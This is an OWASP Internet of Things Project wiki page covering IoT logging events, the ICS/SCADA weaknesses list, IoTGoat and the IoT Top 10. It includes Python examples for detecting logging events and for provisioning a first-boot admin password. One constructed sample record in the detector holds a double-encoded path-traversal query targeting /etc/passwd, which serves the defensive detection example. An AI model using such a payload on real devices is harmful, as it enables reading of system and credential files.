== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum set of IoT device logging events. It covers many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
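<br />
Several of the events above are not single log lines but thresholds over a stream (multiple failed passwords, a high rate of login attempts) or comparisons against ecosystem state (traffic from a device that was never enrolled). The detector below is an added example, not part of the OWASP project or of AppSensor: it reads a list of constructed gateway records and emits events named after the rows of the table. The record format, the thresholds, the time window and the allowed HTTP method set are the example's own assumptions.<br />

```python
"""Added example: turn raw device/gateway records into the logging events
recommended above. Not part of the OWASP project or of AppSensor. The record
format, thresholds and allowed-method set are the example's assumptions;
SAMPLE_RECORDS is constructed, not captured from a real device."""
import re
from collections import defaultdict

ALLOWED_METHODS = {"GET", "POST", "PUT", "DELETE"}
FAILED_PASSWORD_THRESHOLD = 3   # failures per user inside WINDOW
LOGIN_RATE_THRESHOLD = 5        # login attempts per source inside WINDOW
WINDOW = 60                     # seconds
# "%25" is an encoded "%", so "%252e" is a double-encoded "."
DOUBLE_ENCODED_RE = re.compile(r"%25[0-9A-Fa-f]{2}")


def _slide(timestamps, now):
    """Drop timestamps that fell out of the window, then add the current one."""
    return [t for t in timestamps if now - t <= WINDOW] + [now]


def detect(records, enrolled_devices):
    """Return (category, event, detail) tuples in time order.

    Threshold events fire when the count reaches the threshold, not on every
    later attempt, so a burst of 20 failures yields one "Multiple Failed Passwords"."""
    findings = []
    fails_by_user = defaultdict(list)
    attempts_by_src = defaultdict(list)

    for r in sorted(records, key=lambda rec: rec["ts"]):
        ts, src, dev = r["ts"], r.get("src"), r.get("device_id")

        if dev is not None and dev not in enrolled_devices:
            findings.append(("Ecosystem Membership Exceptions", "Traffic Seen from Unenrolled System", dev))

        if r["type"] == "http":
            if r["method"] not in ALLOWED_METHODS:
                findings.append(("Request Exceptions", "Attempt to Invoke Unsupported HTTP Method", r["method"]))
            if DOUBLE_ENCODED_RE.search(r.get("query", "")):
                findings.append(("Input Exceptions", "Double Encoded Character", r["query"]))

        elif r["type"] == "login":
            attempts_by_src[src] = _slide(attempts_by_src[src], ts)
            if len(attempts_by_src[src]) == LOGIN_RATE_THRESHOLD:
                findings.append(("Authentication Exceptions", "High Rate of Login Attempts", src))
            if not r["success"]:
                fails_by_user[r["user"]] = _slide(fails_by_user[r["user"]], ts)
                if len(fails_by_user[r["user"]]) == FAILED_PASSWORD_THRESHOLD:
                    findings.append(("Authentication Exceptions", "Multiple Failed Passwords", r["user"]))
            elif r.get("default_credentials"):
                findings.append(("Administrative Mode Events",
                                 "Device Accessed Using Default Administrative Credentials", r["user"]))
    return findings


# Constructed records: a brute-force against "admin" that ends with the factory
# credential working, two odd HTTP requests, and traffic from an unknown device.
SAMPLE_RECORDS = [
    {"ts": 0,  "type": "login", "src": "10.0.0.9",  "device_id": "cam-01", "user": "admin", "success": False},
    {"ts": 5,  "type": "login", "src": "10.0.0.9",  "device_id": "cam-01", "user": "admin", "success": False},
    {"ts": 9,  "type": "login", "src": "10.0.0.9",  "device_id": "cam-01", "user": "admin", "success": False},
    {"ts": 12, "type": "login", "src": "10.0.0.9",  "device_id": "cam-01", "user": "admin", "success": True,
     "default_credentials": True},
    {"ts": 15, "type": "http",  "src": "10.0.0.9",  "device_id": "cam-01", "method": "TRACE", "query": ""},
    {"ts": 20, "type": "http",  "src": "10.0.0.9",  "device_id": "cam-01", "method": "GET",
     "query": "file=%252e%252e%252fetc%252fpasswd"},
    {"ts": 30, "type": "http",  "src": "10.0.0.44", "device_id": "cam-99", "method": "GET", "query": ""},
    {"ts": 40, "type": "login", "src": "10.0.0.9",  "device_id": "cam-01", "user": "root", "success": False},
]
ENROLLED_DEVICES = {"cam-01", "cam-02"}


if __name__ == "__main__":
    for category, event, detail in detect(SAMPLE_RECORDS, ENROLLED_DEVICES):
        print("%-36s %-58s %s" % (category, event, detail))
```

On the constructed records this produces six events, one per category touched: the third failed password for admin, the successful login with factory credentials, the TRACE request, the double-encoded query, the unenrolled cam-99, and the fifth login attempt from 10.0.0.9. Feeding the output to a SIEM as structured events, rather than relying on raw web server lines, is the point of the list above.<br />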
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Event Logging Project? ==<br />
<br />
The IoT Event Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to feed a solid detection and response program, and companies that want to build one have few good resources on what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}<br />
{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoTGoat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the OWASP IoT Top 10: https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project<br />
<br />
For more information on getting started, visit the project's GitHub repository: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing these mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. It is a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer or manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, as well as many lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>

Aaron.guzman https://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=251798 OWASP Internet of Things Project 2019-05-22T16:33:19Z<p>Aaron.guzman: /* ICS/SCADA Project */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT, including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants, whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten 2014 Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten 2014 PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
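<br />
I1 above, and the Firmware Analysis recommendation that the user be required to create a secure admin password during initial device setup, state the fix without showing it. The class below is an added example, not code from any OWASP project: the device ships with no admin credential at all, every login fails until setup completes, weak or known-default choices are refused, and only a salted PBKDF2-HMAC-SHA256 hash is stored on the device. The default-password list, the minimum length, the variety rule and the iteration count are the example's own choices, not values the page prescribes.<br />

```python
"""Added example: first-boot admin credential provisioning. Not code from any
OWASP project. The device ships with no admin password, refuses weak or
known-default choices, and stores only a salted PBKDF2-HMAC-SHA256 hash."""
import hashlib
import hmac
import os

# Constructed list for the example; a product should check a large breached/default-password set.
KNOWN_DEFAULTS = {"admin", "password", "12345678", "123456789", "root", "default", "support", "user"}
MIN_LENGTH = 12
PBKDF2_ITERATIONS = 600_000  # example choice; tune to the device's CPU budget


class SetupError(ValueError):
    """Raised when a candidate admin password violates the first-boot policy."""


def policy_violation(candidate, device_serial=""):
    """Return the reason a candidate is rejected, or None if it is acceptable."""
    if candidate.lower() in KNOWN_DEFAULTS:
        return "known default password"
    if len(candidate) < MIN_LENGTH:
        return "too short"
    if device_serial and device_serial.lower() in candidate.lower():
        return "derived from device serial"
    if len(set(candidate)) < 4:
        return "too little variety"
    return None


def hash_password(candidate, salt=None):
    """Salted PBKDF2-HMAC-SHA256; the record holds everything needed to verify later."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, PBKDF2_ITERATIONS)
    return {"alg": "pbkdf2-sha256", "iter": PBKDF2_ITERATIONS, "salt": salt.hex(), "hash": digest.hex()}


def verify_password(record, candidate):
    """Constant-time comparison of the recomputed hash against the stored one."""
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(), bytes.fromhex(record["salt"]), record["iter"])
    return hmac.compare_digest(digest.hex(), record["hash"])


class AdminAccount:
    """Ships with no credential; nothing privileged works until setup completes."""

    def __init__(self, device_serial):
        self.device_serial = device_serial
        self.record = None  # never a factory hash: there is no default to guess

    def needs_setup(self):
        return self.record is None

    def complete_setup(self, candidate):
        if not self.needs_setup():
            raise SetupError("already provisioned")
        reason = policy_violation(candidate, self.device_serial)
        if reason:
            raise SetupError(reason)
        self.record = hash_password(candidate)

    def login(self, candidate):
        if self.needs_setup():
            return False  # no default credential exists, so no login can succeed yet
        return verify_password(self.record, candidate)


if __name__ == "__main__":
    acct = AdminAccount("SN-0042-XYZ")
    print("login before setup:", acct.login("admin"))
    acct.complete_setup("correct horse battery staple")
    print("login after setup:", acct.login("correct horse battery staple"))
    print("stored record:", acct.record)
```

The firmware image itself never contains a password or hash for this account, which is what the Firmware Analysis scan for /etc/shadow entries and hardcoded credentials would otherwise find; the serial-number check blocks the common pattern of deriving a "unique" default from a label printed on the device.<br />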
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem.<br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
